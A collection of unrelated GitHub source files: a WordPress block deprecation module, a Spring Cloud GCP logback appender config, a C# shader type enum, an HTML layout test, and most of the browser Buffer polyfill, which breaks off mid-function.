image4FullUrl: attributes.imageURL4,
imageSize: 'full',
// Overlay.
showOverlay: false,
// Overlay hover.
showOverlayHover: true,
overlayHoverBackgroundColor: attributes.overlayColor,
overlayHoverOpacity: isNaN( parseInt( attributes.overlayOpacity, 10 ) ) ? 0.7 : parseInt( attributes.overlayOpacity, 10 ) / 10,
// Arrow.
showArrow: !! attributes.arrow,
arrowAlign: attributes.arrow ? attributes.arrow : undefined,
arrowColor: attributes.titleColor,
// Description.
descriptionColor: attributes.subtitleColor,
// Subtitle.
showSubtitle: false,
// Full width & 1 column.
borderRadius: attributes.columns === 1 && attributes.align === 'full' ? 0 : attributes.borderRadius,
paddingRight: attributes.columns === 1 && attributes.align === 'full' ? 0 : undefined,
paddingLeft: attributes.columns === 1 && attributes.align === 'full' ? 0 : undefined,
}
}
const deprecated = [
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3,
migrate: migrate_1_17_3,
},
/**
* If you blank the title color and/or subtitle color in v1.17.3,
* the block will error out. These deprecation methods will fix those
* errored blocks.
*
* How? Since the migration fails because the saved html didn't have a
* style attribute for the title, the block save doesn't match.
* To fix, we create a new save method that doesn't have the style attribute
* to make the save method match.
*/
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3_( false, false ),
migrate: migrate_1_17_3,
},
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3_( true, false ),
migrate: migrate_1_17_3,
},
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3_( false, true ),
migrate: migrate_1_17_3,
},
]
export default deprecated
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!-- DEPRECATED!!! PLEASE USE "org/springframework/cloud/gcp/logging/logback-appender.xml" -->
<!--
Stackdriver appender logback configuration provided for import.
-->
<included>
<property name="STACKDRIVER_LOG_NAME" value="${STACKDRIVER_LOG_NAME:-spring.log}"/>
<property name="STACKDRIVER_LOG_FLUSH_LEVEL" value="${STACKDRIVER_LOG_FLUSH_LEVEL:-WARN}"/>
<appender name="STACKDRIVER" class="org.springframework.cloud.gcp.logging.LoggingAppender">
<log>${STACKDRIVER_LOG_NAME}</log> <!-- Optional : default java.log -->
<enhancer>org.springframework.cloud.gcp.logging.TraceIdLoggingEnhancer</enhancer>
<flushLevel>${STACKDRIVER_LOG_FLUSH_LEVEL}</flushLevel> <!-- Optional : default ERROR -->
</appender>
</included>
| {
"pile_set_name": "Github"
} |
namespace StrumpyShaderEditor
{
public enum TypeEnum {
Float,
Float2,
Float3,
Float4,
Sampler2D,
SamplerCube,
Matrix
}
public static class TypeExtensions{
public static string ShaderString(this TypeEnum typeEnum)
{
switch (typeEnum)
{
case TypeEnum.Float:
return "float";
case TypeEnum.Float2:
return "float2";
case TypeEnum.Float3:
return "float3";
case TypeEnum.Float4:
return "float4";
case TypeEnum.Sampler2D:
return "Sampler2d";
case TypeEnum.Matrix:
return "float4x4";
case TypeEnum.SamplerCube:
return "SamplerCube";
default:
return "Invalid Type";
}
}
}
} | {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML>
<html>
<head>
<style>
p { float:left; white-space:pre; border:1px solid black; clear:both; }
.space { padding:0 2px; }
table { clear:both; }
</style>
</head>
<body>
<p>
a
</p>
<div style="width:0">
<p>
a
</p>
</div>
<p>
<span class="space">a</span>
</p>
<div style="width:0">
<p class="letterspace">
<span class="space">a</span>
</p>
</div>
<table><tr>
<td style="background-color:#808080;"><pre>
test
abcdefg hijklm nopqr stuv wxy z0 1
</pre></td>
<td style="background-color:#c08080;">cell 2</td>
</tr></table>
</body>
</html>
| {
"pile_set_name": "Github"
} |
/*!
* The buffer module from node.js, for the browser.
*
* @author Feross Aboukhadijeh <[email protected]> <http://feross.org>
* @license MIT
*/
/* eslint-disable no-proto */
'use strict'
var base64 = require('base64-js')
var ieee754 = require('ieee754')
var isArray = require('isarray')
exports.Buffer = Buffer
exports.SlowBuffer = SlowBuffer
exports.INSPECT_MAX_BYTES = 50
/**
* If `Buffer.TYPED_ARRAY_SUPPORT`:
* === true Use Uint8Array implementation (fastest)
* === false Use Object implementation (most compatible, even IE6)
*
* Browsers that support typed arrays are IE 10+, Firefox 4+, Chrome 7+, Safari 5.1+,
* Opera 11.6+, iOS 4.2+.
*
* Due to various browser bugs, sometimes the Object implementation will be used even
* when the browser supports typed arrays.
*
* Note:
*
* - Firefox 4-29 lacks support for adding new properties to `Uint8Array` instances,
* See: https://bugzilla.mozilla.org/show_bug.cgi?id=695438.
*
* - Chrome 9-10 is missing the `TypedArray.prototype.subarray` function.
*
* - IE10 has a broken `TypedArray.prototype.subarray` function which returns arrays of
* incorrect length in some situations.
* We detect these buggy browsers and set `Buffer.TYPED_ARRAY_SUPPORT` to `false` so they
* get the Object implementation, which is slower but behaves correctly.
*/
Buffer.TYPED_ARRAY_SUPPORT = global.TYPED_ARRAY_SUPPORT !== undefined
? global.TYPED_ARRAY_SUPPORT
: typedArraySupport()
/*
* Export kMaxLength after typed array support is determined.
*/
exports.kMaxLength = kMaxLength()
function typedArraySupport () {
try {
var arr = new Uint8Array(1)
arr.__proto__ = {__proto__: Uint8Array.prototype, foo: function () { return 42 }}
return arr.foo() === 42 && // typed array instances can be augmented
typeof arr.subarray === 'function' && // chrome 9-10 lack `subarray`
arr.subarray(1, 1).byteLength === 0 // ie10 has broken `subarray`
} catch (e) {
return false
}
}
function kMaxLength () {
return Buffer.TYPED_ARRAY_SUPPORT
? 0x7fffffff
: 0x3fffffff
}
function createBuffer (that, length) {
if (kMaxLength() < length) {
throw new RangeError('Invalid typed array length')
}
if (Buffer.TYPED_ARRAY_SUPPORT) {
// Return an augmented `Uint8Array` instance, for best performance
that = new Uint8Array(length)
that.__proto__ = Buffer.prototype
} else {
// Fallback: Return an object instance of the Buffer class
if (that === null) {
that = new Buffer(length)
}
that.length = length
}
return that
}
/**
* The Buffer constructor returns instances of `Uint8Array` that have their
* prototype changed to `Buffer.prototype`. Furthermore, `Buffer` is a subclass of
* `Uint8Array`, so the returned instances will have all the node `Buffer` methods
* and the `Uint8Array` methods. Square bracket notation works as expected -- it
* returns a single octet.
*
* The `Uint8Array` prototype remains unmodified.
*/
function Buffer (arg, encodingOrOffset, length) {
if (!Buffer.TYPED_ARRAY_SUPPORT && !(this instanceof Buffer)) {
return new Buffer(arg, encodingOrOffset, length)
}
// Common case.
if (typeof arg === 'number') {
if (typeof encodingOrOffset === 'string') {
throw new Error(
'If encoding is specified then the first argument must be a string'
)
}
return allocUnsafe(this, arg)
}
return from(this, arg, encodingOrOffset, length)
}
Buffer.poolSize = 8192 // not used by this implementation
// TODO: Legacy, not needed anymore. Remove in next major version.
Buffer._augment = function (arr) {
arr.__proto__ = Buffer.prototype
return arr
}
function from (that, value, encodingOrOffset, length) {
if (typeof value === 'number') {
throw new TypeError('"value" argument must not be a number')
}
if (typeof ArrayBuffer !== 'undefined' && value instanceof ArrayBuffer) {
return fromArrayBuffer(that, value, encodingOrOffset, length)
}
if (typeof value === 'string') {
return fromString(that, value, encodingOrOffset)
}
return fromObject(that, value)
}
/**
* Functionally equivalent to Buffer(arg, encoding) but throws a TypeError
* if value is a number.
* Buffer.from(str[, encoding])
* Buffer.from(array)
* Buffer.from(buffer)
* Buffer.from(arrayBuffer[, byteOffset[, length]])
**/
Buffer.from = function (value, encodingOrOffset, length) {
return from(null, value, encodingOrOffset, length)
}
if (Buffer.TYPED_ARRAY_SUPPORT) {
Buffer.prototype.__proto__ = Uint8Array.prototype
Buffer.__proto__ = Uint8Array
if (typeof Symbol !== 'undefined' && Symbol.species &&
Buffer[Symbol.species] === Buffer) {
// Fix subarray() in ES2016. See: https://github.com/feross/buffer/pull/97
Object.defineProperty(Buffer, Symbol.species, {
value: null,
configurable: true
})
}
}
function assertSize (size) {
if (typeof size !== 'number') {
throw new TypeError('"size" argument must be a number')
} else if (size < 0) {
throw new RangeError('"size" argument must not be negative')
}
}
function alloc (that, size, fill, encoding) {
assertSize(size)
if (size <= 0) {
return createBuffer(that, size)
}
if (fill !== undefined) {
// Only pay attention to encoding if it's a string. This
// prevents accidentally sending in a number that would
// be interpretted as a start offset.
return typeof encoding === 'string'
? createBuffer(that, size).fill(fill, encoding)
: createBuffer(that, size).fill(fill)
}
return createBuffer(that, size)
}
/**
* Creates a new filled Buffer instance.
* alloc(size[, fill[, encoding]])
**/
Buffer.alloc = function (size, fill, encoding) {
return alloc(null, size, fill, encoding)
}
function allocUnsafe (that, size) {
assertSize(size)
that = createBuffer(that, size < 0 ? 0 : checked(size) | 0)
if (!Buffer.TYPED_ARRAY_SUPPORT) {
for (var i = 0; i < size; ++i) {
that[i] = 0
}
}
return that
}
/**
* Equivalent to Buffer(num), by default creates a non-zero-filled Buffer instance.
* */
Buffer.allocUnsafe = function (size) {
return allocUnsafe(null, size)
}
/**
* Equivalent to SlowBuffer(num), by default creates a non-zero-filled Buffer instance.
*/
Buffer.allocUnsafeSlow = function (size) {
return allocUnsafe(null, size)
}
function fromString (that, string, encoding) {
if (typeof encoding !== 'string' || encoding === '') {
encoding = 'utf8'
}
if (!Buffer.isEncoding(encoding)) {
throw new TypeError('"encoding" must be a valid string encoding')
}
var length = byteLength(string, encoding) | 0
that = createBuffer(that, length)
var actual = that.write(string, encoding)
if (actual !== length) {
// Writing a hex string, for example, that contains invalid characters will
// cause everything after the first invalid character to be ignored. (e.g.
// 'abxxcd' will be treated as 'ab')
that = that.slice(0, actual)
}
return that
}
function fromArrayLike (that, array) {
var length = array.length < 0 ? 0 : checked(array.length) | 0
that = createBuffer(that, length)
for (var i = 0; i < length; i += 1) {
that[i] = array[i] & 255
}
return that
}
function fromArrayBuffer (that, array, byteOffset, length) {
array.byteLength // this throws if `array` is not a valid ArrayBuffer
if (byteOffset < 0 || array.byteLength < byteOffset) {
throw new RangeError('\'offset\' is out of bounds')
}
if (array.byteLength < byteOffset + (length || 0)) {
throw new RangeError('\'length\' is out of bounds')
}
if (byteOffset === undefined && length === undefined) {
array = new Uint8Array(array)
} else if (length === undefined) {
array = new Uint8Array(array, byteOffset)
} else {
array = new Uint8Array(array, byteOffset, length)
}
if (Buffer.TYPED_ARRAY_SUPPORT) {
// Return an augmented `Uint8Array` instance, for best performance
that = array
that.__proto__ = Buffer.prototype
} else {
// Fallback: Return an object instance of the Buffer class
that = fromArrayLike(that, array)
}
return that
}
function fromObject (that, obj) {
if (Buffer.isBuffer(obj)) {
var len = checked(obj.length) | 0
that = createBuffer(that, len)
if (that.length === 0) {
return that
}
obj.copy(that, 0, 0, len)
return that
}
if (obj) {
if ((typeof ArrayBuffer !== 'undefined' &&
obj.buffer instanceof ArrayBuffer) || 'length' in obj) {
if (typeof obj.length !== 'number' || isnan(obj.length)) {
return createBuffer(that, 0)
}
return fromArrayLike(that, obj)
}
if (obj.type === 'Buffer' && isArray(obj.data)) {
return fromArrayLike(that, obj.data)
}
}
throw new TypeError('First argument must be a string, Buffer, ArrayBuffer, Array, or array-like object.')
}
function checked (length) {
// Note: cannot use `length < kMaxLength()` here because that fails when
// length is NaN (which is otherwise coerced to zero.)
if (length >= kMaxLength()) {
throw new RangeError('Attempt to allocate Buffer larger than maximum ' +
'size: 0x' + kMaxLength().toString(16) + ' bytes')
}
return length | 0
}
function SlowBuffer (length) {
if (+length != length) { // eslint-disable-line eqeqeq
length = 0
}
return Buffer.alloc(+length)
}
Buffer.isBuffer = function isBuffer (b) {
return !!(b != null && b._isBuffer)
}
Buffer.compare = function compare (a, b) {
if (!Buffer.isBuffer(a) || !Buffer.isBuffer(b)) {
throw new TypeError('Arguments must be Buffers')
}
if (a === b) return 0
var x = a.length
var y = b.length
for (var i = 0, len = Math.min(x, y); i < len; ++i) {
if (a[i] !== b[i]) {
x = a[i]
y = b[i]
break
}
}
if (x < y) return -1
if (y < x) return 1
return 0
}
Buffer.isEncoding = function isEncoding (encoding) {
switch (String(encoding).toLowerCase()) {
case 'hex':
case 'utf8':
case 'utf-8':
case 'ascii':
case 'latin1':
case 'binary':
case 'base64':
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return true
default:
return false
}
}
Buffer.concat = function concat (list, length) {
if (!isArray(list)) {
throw new TypeError('"list" argument must be an Array of Buffers')
}
if (list.length === 0) {
return Buffer.alloc(0)
}
var i
if (length === undefined) {
length = 0
for (i = 0; i < list.length; ++i) {
length += list[i].length
}
}
var buffer = Buffer.allocUnsafe(length)
var pos = 0
for (i = 0; i < list.length; ++i) {
var buf = list[i]
if (!Buffer.isBuffer(buf)) {
throw new TypeError('"list" argument must be an Array of Buffers')
}
buf.copy(buffer, pos)
pos += buf.length
}
return buffer
}
function byteLength (string, encoding) {
if (Buffer.isBuffer(string)) {
return string.length
}
if (typeof ArrayBuffer !== 'undefined' && typeof ArrayBuffer.isView === 'function' &&
(ArrayBuffer.isView(string) || string instanceof ArrayBuffer)) {
return string.byteLength
}
if (typeof string !== 'string') {
string = '' + string
}
var len = string.length
if (len === 0) return 0
// Use a for loop to avoid recursion
var loweredCase = false
for (;;) {
switch (encoding) {
case 'ascii':
case 'latin1':
case 'binary':
return len
case 'utf8':
case 'utf-8':
case undefined:
return utf8ToBytes(string).length
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return len * 2
case 'hex':
return len >>> 1
case 'base64':
return base64ToBytes(string).length
default:
if (loweredCase) return utf8ToBytes(string).length // assume utf8
encoding = ('' + encoding).toLowerCase()
loweredCase = true
}
}
}
Buffer.byteLength = byteLength
function slowToString (encoding, start, end) {
var loweredCase = false
// No need to verify that "this.length <= MAX_UINT32" since it's a read-only
// property of a typed array.
// This behaves neither like String nor Uint8Array in that we set start/end
// to their upper/lower bounds if the value passed is out of range.
// undefined is handled specially as per ECMA-262 6th Edition,
// Section 13.3.3.7 Runtime Semantics: KeyedBindingInitialization.
if (start === undefined || start < 0) {
start = 0
}
// Return early if start > this.length. Done here to prevent potential uint32
// coercion fail below.
if (start > this.length) {
return ''
}
if (end === undefined || end > this.length) {
end = this.length
}
if (end <= 0) {
return ''
}
// Force coersion to uint32. This will also coerce falsey/NaN values to 0.
end >>>= 0
start >>>= 0
if (end <= start) {
return ''
}
if (!encoding) encoding = 'utf8'
while (true) {
switch (encoding) {
case 'hex':
return hexSlice(this, start, end)
case 'utf8':
case 'utf-8':
return utf8Slice(this, start, end)
case 'ascii':
return asciiSlice(this, start, end)
case 'latin1':
case 'binary':
return latin1Slice(this, start, end)
case 'base64':
return base64Slice(this, start, end)
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return utf16leSlice(this, start, end)
default:
if (loweredCase) throw new TypeError('Unknown encoding: ' + encoding)
encoding = (encoding + '').toLowerCase()
loweredCase = true
}
}
}
// The property is used by `Buffer.isBuffer` and `is-buffer` (in Safari 5-7) to detect
// Buffer instances.
Buffer.prototype._isBuffer = true
function swap (b, n, m) {
var i = b[n]
b[n] = b[m]
b[m] = i
}
Buffer.prototype.swap16 = function swap16 () {
var len = this.length
if (len % 2 !== 0) {
throw new RangeError('Buffer size must be a multiple of 16-bits')
}
for (var i = 0; i < len; i += 2) {
swap(this, i, i + 1)
}
return this
}
Buffer.prototype.swap32 = function swap32 () {
var len = this.length
if (len % 4 !== 0) {
throw new RangeError('Buffer size must be a multiple of 32-bits')
}
for (var i = 0; i < len; i += 4) {
swap(this, i, i + 3)
swap(this, i + 1, i + 2)
}
return this
}
Buffer.prototype.swap64 = function swap64 () {
var len = this.length
if (len % 8 !== 0) {
throw new RangeError('Buffer size must be a multiple of 64-bits')
}
for (var i = 0; i < len; i += 8) {
swap(this, i, i + 7)
swap(this, i + 1, i + 6)
swap(this, i + 2, i + 5)
swap(this, i + 3, i + 4)
}
return this
}
Buffer.prototype.toString = function toString () {
var length = this.length | 0
if (length === 0) return ''
if (arguments.length === 0) return utf8Slice(this, 0, length)
return slowToString.apply(this, arguments)
}
Buffer.prototype.equals = function equals (b) {
if (!Buffer.isBuffer(b)) throw new TypeError('Argument must be a Buffer')
if (this === b) return true
return Buffer.compare(this, b) === 0
}
Buffer.prototype.inspect = function inspect () {
var str = ''
var max = exports.INSPECT_MAX_BYTES
if (this.length > 0) {
str = this.toString('hex', 0, max).match(/.{2}/g).join(' ')
if (this.length > max) str += ' ... '
}
return '<Buffer ' + str + '>'
}
Buffer.prototype.compare = function compare (target, start, end, thisStart, thisEnd) {
if (!Buffer.isBuffer(target)) {
throw new TypeError('Argument must be a Buffer')
}
if (start === undefined) {
start = 0
}
if (end === undefined) {
end = target ? target.length : 0
}
if (thisStart === undefined) {
thisStart = 0
}
if (thisEnd === undefined) {
thisEnd = this.length
}
if (start < 0 || end > target.length || thisStart < 0 || thisEnd > this.length) {
throw new RangeError('out of range index')
}
if (thisStart >= thisEnd && start >= end) {
return 0
}
if (thisStart >= thisEnd) {
return -1
}
if (start >= end) {
return 1
}
start >>>= 0
end >>>= 0
thisStart >>>= 0
thisEnd >>>= 0
if (this === target) return 0
var x = thisEnd - thisStart
var y = end - start
var len = Math.min(x, y)
var thisCopy = this.slice(thisStart, thisEnd)
var targetCopy = target.slice(start, end)
for (var i = 0; i < len; ++i) {
if (thisCopy[i] !== targetCopy[i]) {
x = thisCopy[i]
y = targetCopy[i]
break
}
}
if (x < y) return -1
if (y < x) return 1
return 0
}
// Finds either the first index of `val` in `buffer` at offset >= `byteOffset`,
// OR the last index of `val` in `buffer` at offset <= `byteOffset`.
//
// Arguments:
// - buffer - a Buffer to search
// - val - a string, Buffer, or number
// - byteOffset - an index into `buffer`; will be clamped to an int32
// - encoding - an optional encoding, relevant is val is a string
// - dir - true for indexOf, false for lastIndexOf
function bidirectionalIndexOf (buffer, val, byteOffset, encoding, dir) {
// Empty buffer means no match
if (buffer.length === 0) return -1
// Normalize byteOffset
if (typeof byteOffset === 'string') {
encoding = byteOffset
byteOffset = 0
} else if (byteOffset > 0x7fffffff) {
byteOffset = 0x7fffffff
} else if (byteOffset < -0x80000000) {
byteOffset = -0x80000000
}
byteOffset = +byteOffset // Coerce to Number.
if (isNaN(byteOffset)) {
// byteOffset: it it's undefined, null, NaN, "foo", etc, search whole buffer
byteOffset = dir ? 0 : (buffer.length - 1)
}
// Normalize byteOffset: negative offsets start from the end of the buffer
if (byteOffset < 0) byteOffset = buffer.length + byteOffset
if (byteOffset >= buffer.length) {
if (dir) return -1
else byteOffset = buffer.length - 1
} else if (byteOffset < 0) {
if (dir) byteOffset = 0
else return -1
}
// Normalize val
if (typeof val === 'string') {
val = Buffer.from(val, encoding)
}
// Finally, search either indexOf (if dir is true) or lastIndexOf
if (Buffer.isBuffer(val)) {
// Special case: looking for empty string/buffer always fails
if (val.length === 0) {
return -1
}
return arrayIndexOf(buffer, val, byteOffset, encoding, dir)
} else if (typeof val === 'number') {
val = val & 0xFF // Search for a byte value [0-255]
if (Buffer.TYPED_ARRAY_SUPPORT &&
typeof Uint8Array.prototype.indexOf === 'function') {
if (dir) {
return Uint8Array.prototype.indexOf.call(buffer, val, byteOffset)
} else {
return Uint8Array.prototype.lastIndexOf.call(buffer, val, byteOffset)
}
}
return arrayIndexOf(buffer, [ val ], byteOffset, encoding, dir)
}
throw new TypeError('val must be string, number or Buffer')
}
function arrayIndexOf (arr, val, byteOffset, encoding, dir) {
var indexSize = 1
var arrLength = arr.length
var valLength = val.length
if (encoding !== undefined) {
encoding = String(encoding).toLowerCase()
if (encoding === 'ucs2' || encoding === 'ucs-2' ||
encoding === 'utf16le' || encoding === 'utf-16le') {
if (arr.length < 2 || val.length < 2) {
return -1
}
indexSize = 2
arrLength /= 2
valLength /= 2
byteOffset /= 2
}
}
function read (buf, i) {
if (indexSize === 1) {
return buf[i]
} else {
return buf.readUInt16BE(i * indexSize)
}
}
var i
if (dir) {
var foundIndex = -1
for (i = byteOffset; i < arrLength; i++) {
if (read(arr, i) === read(val, foundIndex === -1 ? 0 : i - foundIndex)) {
if (foundIndex === -1) foundIndex = i
if (i - foundIndex + 1 === valLength) return foundIndex * indexSize
} else {
if (foundIndex !== -1) i -= i - foundIndex
foundIndex = -1
}
}
} else {
if (byteOffset + valLength > arrLength) byteOffset = arrLength - valLength
for (i = byteOffset; i >= 0; i--) {
var found = true
for (var j = 0; j < valLength; j++) {
if (read(arr, i + j) !== read(val, j)) {
found = false
break
}
}
if (found) return i
}
}
return -1
}
Buffer.prototype.includes = function includes (val, byteOffset, encoding) {
return this.indexOf(val, byteOffset, encoding) !== -1
}
Buffer.prototype.indexOf = function indexOf (val, byteOffset, encoding) {
return bidirectionalIndexOf(this, val, byteOffset, encoding, true)
}
Buffer.prototype.lastIndexOf = function lastIndexOf (val, byteOffset, encoding) {
return bidirectionalIndexOf(this, val, byteOffset, encoding, false)
}
function hexWrite (buf, string, offset, length) {
offset = Number(offset) || 0
var remaining = buf.length - offset
if (!length) {
length = remaining
} else {
length = Number(length)
if (length > remaining) {
length = remaining
}
}
// must be an even number of digits
var strLen = string.length
if (strLen % 2 !== 0) throw new TypeError('Invalid hex string')
if (length > strLen / 2) {
length = strLen / 2
}
for (var i = 0; i < length; ++i) {
var parsed = parseInt(string.substr(i * 2, 2), 16)
if (isNaN(parsed)) return i
buf[offset + i] = parsed
}
return i
}
function utf8Write (buf, string, offset, length) {
return blitBuffer(utf8ToBytes(string, buf.length - offset), buf, offset, length)
}
function asciiWrite (buf, string, offset, length) {
return blitBuffer(asciiToBytes(string), buf, offset, length)
}
function latin1Write (buf, string, offset, length) {
return asciiWrite(buf, string, offset, length)
}
function base64Write (buf, string, offset, length) {
return blitBuffer(base64ToBytes(string), buf, offset, length)
}
function ucs2Write (buf, string, offset, length) {
return blitBuffer(utf16leToBytes(string, buf.length - offset), buf, offset, length)
}
Buffer.prototype.write = function write (string, offset, length, encoding) {
// Buffer#write(string)
if (offset === undefined) {
encoding = 'utf8'
length = this.length
offset = 0
// Buffer#write(string, encoding)
} else if (length === undefined && typeof offset === 'string') {
encoding = offset
length = this.length
offset = 0
// Buffer#write(string, offset[, length][, encoding])
} else if (isFinite(offset)) {
offset = offset | 0
if (isFinite(length)) {
length = length | 0
if (encoding === undefined) encoding = 'utf8'
} else {
encoding = length
length = undefined
}
// legacy write(string, encoding, offset, length) - remove in v0.13
} else {
throw new Error(
'Buffer.write(string, encoding, offset[, length]) is no longer supported'
)
}
var remaining = this.length - offset
if (length === undefined || length > remaining) length = remaining
if ((string.length > 0 && (length < 0 || offset < 0)) || offset > this.length) {
throw new RangeError('Attempt to write outside buffer bounds')
}
if (!encoding) encoding = 'utf8'
var loweredCase = false
for (;;) {
switch (encoding) {
case 'hex':
return hexWrite(this, string, offset, length)
case 'utf8':
case 'utf-8':
return utf8Write(this, string, offset, length)
case 'ascii':
return asciiWrite(this, string, offset, length)
case 'latin1':
case 'binary':
return latin1Write(this, string, offset, length)
case 'base64':
// Warning: maxLength not taken into account in base64Write
return base64Write(this, string, offset, length)
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return ucs2Write(this, string, offset, length)
default:
if (loweredCase) throw new TypeError('Unknown encoding: ' + encoding)
encoding = ('' + encoding).toLowerCase()
loweredCase = true
}
}
}
Buffer.prototype.toJSON = function toJSON () {
return {
type: 'Buffer',
data: Array.prototype.slice.call(this._arr || this, 0)
}
}
function base64Slice (buf, start, end) {
if (start === 0 && end === buf.length) {
return base64.fromByteArray(buf)
} else {
return base64.fromByteArray(buf.slice(start, end))
}
}
function utf8Slice (buf, start, end) {
end = Math.min(buf.length, end)
var res = []
var i = start
while (i < end) {
var firstByte = buf[i]
var codePoint = null
var bytesPerSequence = (firstByte > 0xEF) ? 4
: (firstByte > 0xDF) ? 3
: (firstByte > 0xBF) ? 2
: 1
if (i + bytesPerSequence <= end) {
var secondByte, thirdByte, fourthByte, tempCodePoint
switch (bytesPerSequence) {
case 1:
if (firstByte < 0x80) {
codePoint = firstByte
}
break
case 2:
secondByte = buf[i + 1]
if ((secondByte & 0xC0) === 0x80) {
tempCodePoint = (firstByte & 0x1F) << 0x6 | (secondByte & 0x3F)
if (tempCodePoint > 0x7F) {
codePoint = tempCodePoint
}
}
break
case 3:
secondByte = buf[i + 1]
thirdByte = buf[i + 2]
if ((secondByte & 0xC0) === 0x80 && (thirdByte & 0xC0) === 0x80) {
tempCodePoint = (firstByte & 0xF) << 0xC | (secondByte & 0x3F) << 0x6 | (thirdByte & 0x3F)
if (tempCodePoint > 0x7FF && (tempCodePoint < 0xD800 || tempCodePoint > 0xDFFF)) {
codePoint = tempCodePoint
}
}
break
case 4:
secondByte = buf[i + 1]
thirdByte = buf[i + 2]
fourthByte = buf[i + 3]
if ((secondByte & 0xC0) === 0x80 && (thirdByte & 0xC0) === 0x80 && (fourthByte & 0xC0) === 0x80) {
tempCodePoint = (firstByte & 0xF) << 0x12 | (secondByte & 0x3F) << 0xC | (thirdByte & 0x3F) << 0x6 | (fourthByte & 0x3F)
if (tempCodePoint > 0xFFFF && tempCodePoint < 0x110000) {
codePoint = tempCodePoint
}
}
}
}
if (codePoint === null) {
// we did not generate a valid codePoint so insert a
// replacement char (U+FFFD) and advance only 1 byte
codePoint = 0xFFFD
bytesPerSequence = 1
} else if (codePoint > 0xFFFF) {
// encode to utf16 (surrogate pair dance)
codePoint -= 0x10000
res.push(codePoint >>> 10 & 0x3FF | 0xD800)
codePoint = 0xDC00 | codePoint & 0x3FF
}
res.push(codePoint)
i += bytesPerSequence
}
return decodeCodePointsArray(res)
}
// Based on http://stackoverflow.com/a/22747272/680742, the browser with
// the lowest limit is Chrome, with 0x10000 args.
// We go 1 magnitude less, for safety
var MAX_ARGUMENTS_LENGTH = 0x1000
function decodeCodePointsArray (codePoints) {
var len = codePoints.length
if (len <= MAX_ARGUMENTS_LENGTH) {
return String.fromCharCode.apply(String, codePoints) // avoid extra slice()
}
// Decode in chunks to avoid "call stack size exceeded".
var res = ''
var i = 0
while (i < len) {
res += String.fromCharCode.apply(
String,
codePoints.slice(i, i += MAX_ARGUMENTS_LENGTH)
)
}
return res
}
function asciiSlice (buf, start, end) {
var ret = ''
end = Math.min(buf.length, end)
for (var i = start; i < end; ++i) {
ret += String.fromCharCode(buf[i] & 0x7F)
}
return ret
}
function latin1Slice (buf, start, end) {
var ret = ''
end = Math.min(buf.length, end)
for (var i = start; i < end; ++i) {
ret += String.fromCharCode(buf[i])
}
return ret
}
function hexSlice (buf, start, end) {
var len = buf.length
if (!start || start < 0) start = 0
if (!end || end < 0 || end > len) end = len
var out = ''
for (var i = start; i < end; ++i) {
out += toHex(buf[i])
}
return out
}
function utf16leSlice (buf, start, end) {
var bytes = buf.slice(start, end)
var res = ''
for (var i = 0; i < bytes.length; i += 2) {
res += String.fromCharCode(bytes[i] + bytes[i + 1] * 256)
}
return res
}
Buffer.prototype.slice = function slice (start, end) {
var len = this.length
start = ~~start
end = end === undefined ? len : ~~end
if (start < 0) {
start += len
if (start < 0) start = 0
} else if (start > len) {
start = len
}
if (end < 0) {
end += len
if (end < 0) end = 0
} else if (end > len) {
end = len
}
if (end < start) end = start
var newBuf
if (Buffer.TYPED_ARRAY_SUPPORT) {
newBuf = this.subarray(start, end)
newBuf.__proto__ = Buffer.prototype
} else {
var sliceLen = end - start
newBuf = new Buffer(sliceLen, undefined)
for (var i = 0; i < sliceLen; ++i) {
newBuf[i] = this[i + start]
}
}
return newBuf
}
/*
* Need to make sure that buffer isn't trying to write out of bounds.
*/
function checkOffset (offset, ext, length) {
if ((offset % 1) !== 0 || offset < 0) throw new RangeError('offset is not uint')
if (offset + ext > length) throw new RangeError('Trying to access beyond buffer length')
}
Buffer.prototype.readUIntLE = function readUIntLE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) checkOffset(offset, byteLength, this.length)
var val = this[offset]
var mul = 1
var i = 0
while (++i < byteLength && (mul *= 0x100)) {
val += this[offset + i] * mul
}
return val
}
Buffer.prototype.readUIntBE = function readUIntBE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) {
checkOffset(offset, byteLength, this.length)
}
var val = this[offset + --byteLength]
var mul = 1
while (byteLength > 0 && (mul *= 0x100)) {
val += this[offset + --byteLength] * mul
}
return val
}
Buffer.prototype.readUInt8 = function readUInt8 (offset, noAssert) {
if (!noAssert) checkOffset(offset, 1, this.length)
return this[offset]
}
Buffer.prototype.readUInt16LE = function readUInt16LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
return this[offset] | (this[offset + 1] << 8)
}
Buffer.prototype.readUInt16BE = function readUInt16BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 2, this.length)
return (this[offset] << 8) | this[offset + 1]
}
Buffer.prototype.readUInt32LE = function readUInt32LE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return ((this[offset]) |
(this[offset + 1] << 8) |
(this[offset + 2] << 16)) +
(this[offset + 3] * 0x1000000)
}
Buffer.prototype.readUInt32BE = function readUInt32BE (offset, noAssert) {
if (!noAssert) checkOffset(offset, 4, this.length)
return (this[offset] * 0x1000000) +
((this[offset + 1] << 16) |
(this[offset + 2] << 8) |
this[offset + 3])
}
Buffer.prototype.readIntLE = function readIntLE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) checkOffset(offset, byteLength, this.length)
var val = this[offset]
var mul = 1
var i = 0
while (++i < byteLength && (mul *= 0x100)) {
val += this[offset + i] * mul
}
mul *= 0x80
if (val >= mul) val -= Math.pow(2, 8 * byteLength)
return val
}
Buffer.prototype.readIntBE = function readIntBE (offset, byteLength, noAssert) {
offset = offset | 0
byteLength = byteLength | 0
if (!noAssert) checkOffset(offset, byteLength, this.length)
var i = byteLength
var mul = 1
